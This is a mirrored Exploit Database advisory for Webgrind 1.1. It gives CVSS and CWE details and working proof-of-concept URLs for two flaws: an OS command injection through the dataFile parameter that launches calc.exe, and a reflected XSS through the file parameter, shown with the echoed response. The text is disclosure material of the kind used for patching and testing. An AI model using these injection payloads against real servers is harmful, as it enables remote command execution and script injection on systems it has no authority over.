Webgrind 1.1 – Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)

• Exploit Database
• 40 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51074/

• # Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
  # Discovery by: Rafael Pedrero
  # Discovery Date: 2022-02-13
  # Vendor Homepage: http://github.com/jokkedk/webgrind/
  # Software Link : http://github.com/jokkedk/webgrind/
  # Tested Version: 1.1
  # Tested on:Windows 10 using XAMPP
  
  # Vulnerability Type: Remote Command Execution (RCE)
  
  CVSS v3: 9.8
  CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  CWE: CWE-434
  
  Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.
  
  Proof of concept:
  
  http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph
  
  And the calc.exe opens.
  
  Note: 0'&calc.exe&', & char is neccesary to execute the command.
  
  
  # Vulnerability Type: reflected Cross-Site Scripting (XSS)
  
  CVSS v3: 6.5
  CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  CWE: CWE-79
  
  Vulnerability description: Webgrind v1.1 and before, does not sufficiently
  encode user-controlled inputs, resulting in a reflected Cross-Site
  Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
  in file parameter.
  
  Proof of concept:
  
  http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E
  
  Response:
  ...
  <title>
  webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
  <script type="text/javascript" charset="utf-8">